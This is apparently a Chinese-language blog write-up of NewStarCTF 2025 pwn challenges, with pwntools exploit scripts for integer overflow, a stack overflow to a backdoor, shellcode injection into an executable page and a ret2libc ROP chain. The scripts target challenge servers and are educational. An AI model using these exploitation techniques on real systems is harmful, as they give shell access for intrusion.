Sorry, your browser cannot access this site
This page requires browser support (enable) JavaScript
Learn more >

NewstarCTF2025 pwn WP

NewStarCTF

发布于:Sep 30, 2025

PWN1

GNU Debugger

开靶机,运行:

要查看r12寄存器,于是在register窗口查看:

复制过去

第二关:

使用telescope查看该地址:

telescope 0x555555557c27

复制后进入下一关

在这个位置使用b下断点:

b *(0x555555555779)

使用set指令设置该地址为0xdeadbeef

set *(0x7fffffffdce4)=0xdeadbeef

INTbug

checksec:

全保护64位,IDA查看

进行了一次scanf并且只能输入正数,对比需要为负数才能cat flag 想到整数溢出

同时scanf的格式化字符是%1d 也就是说每次只能输入一个数字

那就用一个循环来输入,直到超过32766次就能溢出变成负数

exp:

1
2
3
4
5
6
7
8
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("8.147.134.121", 22904)

for i in range(32767):
    p.send(b'1')

p.interactive()

pwn’s door

checksec:

没开PIE IDA64:

直接输入7038329就能得到shell

overflow

checksec:

保护都关了 IDA64打开:

有后门,有gets无限输入,直接栈溢出

1
2
3
4
5
6
7
8
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = process('./overflow')
p = remote("8.147.134.121", 35190)
payload = b'a' * (0x100 + 8) + p64(0x401201)
p.sendline(payload)

p.interactive()

input_function

checksec:

没开canary IDA64:

用mmap开辟了一段rwx页 再读取 输入shellcode进去就行

1
2
3
4
5
6
7
8
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = process('./input_function')
p = remote("8.147.132.32", 14362)
shellcode = asm(shellcraft.sh())

p.send(shellcode)
p.interactive()

WEEK2

calc_beta

checksec:

没开PIE IDA64打开

看editnumbers

能输入0-17的数字 经测试输入0后再输入会跳转到输入的地址 同时会继续执行下方的语句

所以能够利用这个构造ROP 相当于一个变异的ret2libc

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#enter 0:return to entered addr
p =  process('./calc')
#p = remote("39.106.57.152", 32844)
elf= ELF('./calc')
libc =ELF('./libc.so.6')
write_plt = elf.plt['write']
write_got = elf.got['write']

#gdb.attach(p)
pop_rdi_ret = 0x0000000000401253
pop_rsi_r15_ret= 0x0000000000401251
main_addr = 0x4010b4
ret_addr = 0x00000000004006b6
p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'1')
p.sendlineafter("> ",str(1))

p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'2')
p.sendlineafter("> ",str(pop_rsi_r15_ret))

p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'3')
p.sendlineafter("> ",str(write_got))

p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'4')
p.sendlineafter("> ",str(0))

p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'5')
p.sendlineafter("> ",str(write_plt))

p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'6')
p.sendlineafter("> ",str(ret_addr))

p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'7')
p.sendlineafter("> ",str(main_addr))

p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'0')
#pause()
p.sendafter("> ",str(pop_rdi_ret))

libc_addr = u64(p.recv(6).ljust(8,b'\x00')) - 0x114870
write_addr = libc_addr + 0x114870
'''
libc = LibcSearcher('write', write_addr)
offset = write_addr - libc.dump('write')
binsh = offset + libc.dump('str_bin_sh')
system = offset + libc.dump('system')
'''
print(hex(libc_addr))
pause()
binsh = libc_addr + libc.search('/bin/sh').__next__()
system = libc_addr + libc.sym['system']
print(hex(binsh))
print(hex(system))
p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'1')
p.sendlineafter("> ",str(binsh))

p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'2')
p.sendlineafter("> ",str(ret_addr))

p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'3')
p.sendlineafter("> ",str(system))
#pause()
p.sendlineafter("> ",b'2')
p.sendlineafter("> ",b'0')
p.sendafter("> ",str(pop_rdi_ret))

p.interactive()

更新于:Oct 15, 2025

pwn

评论